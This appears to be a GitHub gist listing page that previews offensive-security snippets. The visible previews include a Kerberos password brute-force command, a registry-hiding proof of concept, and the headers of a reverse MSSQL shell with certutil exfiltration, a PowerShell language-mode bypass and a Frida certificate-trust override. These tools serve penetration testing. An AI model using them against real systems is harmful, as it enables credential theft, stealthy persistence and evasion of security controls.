Skip to content

Instantly share code, notes, and snippets.

Avatar

Myo Soe (aka Aung Khant) yehgdotnet

View GitHub Profile
@szski
szski / GraphQL-Introspection-Query-Url-Encoded
Created Oct 6, 2019
Append this string after https://examplegqlapi.com/?query= to test for introspection query
View GraphQL-Introspection-Query-Url-Encoded
query%20IntrospectionQuery%20%7B%0A%20%20%20%20__schema%20%7B%0A%20%20%20%20%20%20queryType%20%7B%20name%20%7D%0A%20%20%20%20%20%20mutationType%20%7B%20name%20%7D%0A%20%20%20%20%20%20types%20%7B%0A%20%20%20%20%20%20%20%20...FullType%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20directives%20%7B%0A%20%20%20%20%20%20%20%20name%0A%20%20%20%20%20%20%20%20description%0A%20%20%20%20%20%20%20%20locations%0A%20%20%20%20%20%20%20%20args%20%7B%0A%20%20%20%20%20%20%20%20%20%20...InputValue%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%20%20%7D%0A%20%20fragment%20FullType%20on%20__Type%20%7B%0A%20%20%20%20kind%0A%20%20%20%20name%0A%20%20%20%20description%0A%20%20%20%20fields%28includeDeprecated%3A%20true%29%20%7B%0A%20%20%20%20%20%20name%0A%20%20%20%20%20%20description%0A%20%20%20%20%20%20args%20%7B%0A%20%20%20%20%20%20%20%20...InputValue%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20type%20%7B%0A%20%20%20%20%20%20%20%20...TypeRef%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20isDeprecated%0A%20%20%
@Graph-X
Graph-X / ironregistry.py
Last active Oct 1, 2019
PoC for hiding things in the registry. My testing hasn't returned any errors when viewing in regedit
View ironregistry.py
from Microsoft.Win32 import Registry
from time import sleep
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest")
rkey.SetValue(u'\x00 this is a test',u'\x00look at me!')
rkey.Close()
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest")
values = rkey.GetValueNames()
print("We have {0} values.".format(str(len(values))))
print("The value names returned are: {0}.".format(values[0]))
value = rkey.GetValue(u'\x00 this is a test')
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019
A cheatsheet with commands that can be used to perform kerberos attacks
View kerberos_attacks_cheatsheet.md

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@mritunjay-k
mritunjay-k / whats_ur_status.py
Last active Nov 24, 2019
Provide it a list of domains and it will show you which of them is 200 OK or 404 NOT FOUND (extremly helpful for web application bug hunting)
View whats_ur_status.py
#!/usr/bin/env python
import requests
try:
read_file = open(input("Enter path of the file containing subdomains: "),'r')
for host in read_file:
domain = host.rstrip("\n")
try:
View http_screenshot.py
# Author: b0yd @rwincey
# Website: securifera.com
#
# Setup:
# -------------------------------------------------
# pip install selenium
# wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
# google-chrome-stable --version
# Vist http://chromedriver.chromium.org/downloads to identity the right version
# wget https://chromedriver.storage.googleapis.com/72.0.3626.69/chromedriver_linux64.zip
@xassiz
xassiz / mandros.py
Created Mar 16, 2018
Reverse MSSQL shell
View mandros.py
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''
View Preventing-Puppeteer-Detection.md

I’m looking for any tips or tricks for making chrome headless mode less detectable. Here is what I’ve done so far:

Set my args as follows:

const run = (async () => {

    const args = [
        '--no-sandbox',
        '--disable-setuid-sandbox',
        '--disable-infobars',
@staaldraad
staaldraad / awk_netstat.sh
Last active Jul 30, 2021
AWK to get details from /proc/net/tcp and /proc/net/udp when netstat and lsof are not available
View awk_netstat.sh
# Gawk version
# Remote
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($3,index($3,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($3,i,2))}{print x":"strtonum("0x"substr($3,index($3,":")+1,4))}'
# Local
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}'
# No Gawk
# Local
grep -v "rem_address" /proc/net/tcp | awk 'function hextodec(str,ret,n,i,k,c){
@mattifestation
mattifestation / RunscripthelperBypass.ps1
Created Oct 29, 2017
PowerShell weaponization for the runscripthelper.exe constrained language mode bypass
View RunscripthelperBypass.ps1
function Invoke-RunScriptHelperExpression {
<#
.SYNOPSIS
Executes PowerShell code in full language mode in the context of runscripthelper.exe.
.DESCRIPTION
Invoke-RunScriptHelperExpression executes PowerShell code in the context of runscripthelper.exe - a Windows-signed PowerShell host application which appears to be used for telemetry collection purposes. The PowerShell code supplied will run in FullLanguage mode and bypass constrained language mode.
@oleavr
oleavr / trust-manager.js
Created Jun 8, 2017
How to implement an X509TrustManager using Frida
View trust-manager.js
'use strict';
var TrustManager;
var manager;
Java.perform(function () {
var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager');
TrustManager = Java.registerClass({
name: 'com.example.TrustManager',